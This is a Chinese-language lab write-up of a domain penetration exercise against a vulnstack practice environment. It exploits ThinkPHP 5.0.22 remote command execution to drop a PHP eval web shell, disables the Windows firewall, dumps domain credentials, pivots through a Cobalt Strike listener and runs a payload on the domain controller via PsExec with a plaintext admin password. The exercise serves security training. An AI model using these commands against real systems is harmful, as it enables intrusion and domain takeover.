单机域渗透练习

简介: 单机域渗透练习

环 境

Win7 +phpstudy+thinkphp(5.0.22) 双网卡

ip  192.168.5.139       桥接模式

ip  192.168.138.136   仅主机模式

Win2008                  仅主机模式

ip 192.168.5.139

下载地址:http://vulnstack.qiyuanxuetang.net/vuln/detail/7/

首先访问url

http://192.168.5.139/

Goby扫描 发现tp5.x 远程命令执行

查看目录后 写入一句话


echo "<?php @eval($_POST['123']);?>" >C://phpStudy//PHPTutorial//WWW//public//shell.php


菜刀连接

查看存活主机


查看详细ip地址  ipconfig  /all  可以看到域  (忘了截图)

查找域ip  ping sun.com

查看域内用户

640.png

提权system 查看进程无杀毒软件

CS制作木马 一直连不上

发现防火墙没有关闭 直接关闭

netsh firewall set opmode disable

获取域用户密码

提权SYSTEM

内网可以用psexec登录的主机,基于ipc共享,要打开445端口才可以,所以扫一下445端口

Win7  双网卡 dc 内网 这个时候就让dc主动链接cs 可以通过win7 中转会话

win7  进入中专 建立监听 监听地址6666

再次生成木马 选择刚才的监听 6666

把木马和工具上传到win7

640.png

刚才我们看到了域内有三个用户 这里的用户就是域内用户 密码在上面已经抓取出来了

shell C:\phpStudy\PHPTutorial\WWW\public\PsExec64.exe -accepteula \\192.168.138.138-u sun\Administrator -p admin@123 -d -c C:\phpStudy\PHPTutorial\WWW\public\dc.exe

抓取密码 可以看到dc的密码了域控也就到手了

相关文章
|
8月前
|
监控 安全 Linux
【专栏】拿到一台新的物理服务器,有几项关键的准备工作和安全措施是必须要做的
【4月更文挑战第28天】新服务器部署前,需进行系统初始化(安装OS、网络配置、用户管理)、安全加固(更新补丁、关闭不必要的服务、防火墙设置)和性能优化(调整内核参数、文件系统优化)。同时,设置监控系统(如Nagios)以检查硬件和软件资源,制定备份策略确保数据安全。这些步骤确保服务器稳定、安全、高效运行。
271 1
|
安全 网络协议 Shell
|
存储 SQL 网络协议
内网渗透|初识域基础及搭建简单域
内网渗透|初识域基础及搭建简单域
301 0
|
安全
域渗透|浅谈MS17010多种打法(二)
域渗透|浅谈MS17010多种打法
356 0
域渗透|浅谈MS17010多种打法(二)
|
安全 网络安全 Windows
域渗透|浅谈MS17010多种打法(一)
域渗透|浅谈MS17010多种打法
600 0
域渗透|浅谈MS17010多种打法(一)
|
边缘计算 编解码 数据可视化
带你读《思科软件定义访问 : 实现基于业务意图的园区网络》第二章软件定义访问体系结构2.3(四)
带你读《思科软件定义访问 : 实现基于业务意图的园区网络》第二章软件定义访问体系结构2.3
带你读《思科软件定义访问 : 实现基于业务意图的园区网络》第二章软件定义访问体系结构2.3(四)
|
安全 测试技术 数据安全/隐私保护
带你读《思科软件定义访问 : 实现基于业务意图的园区网络》第二章软件定义访问体系结构2.6(二)
《思科软件定义访问 : 实现基于业务意图的园区网络》第二章软件定义访问体系结构2.6
带你读《思科软件定义访问 : 实现基于业务意图的园区网络》第二章软件定义访问体系结构2.6(二)
|
安全 物联网 测试技术
带你读《思科软件定义访问 : 实现基于业务意图的园区网络》第二章软件定义访问体系结构2.6(一)
带你读《思科软件定义访问 : 实现基于业务意图的园区网络》第二章软件定义访问体系结构2.6
带你读《思科软件定义访问 : 实现基于业务意图的园区网络》第二章软件定义访问体系结构2.6(一)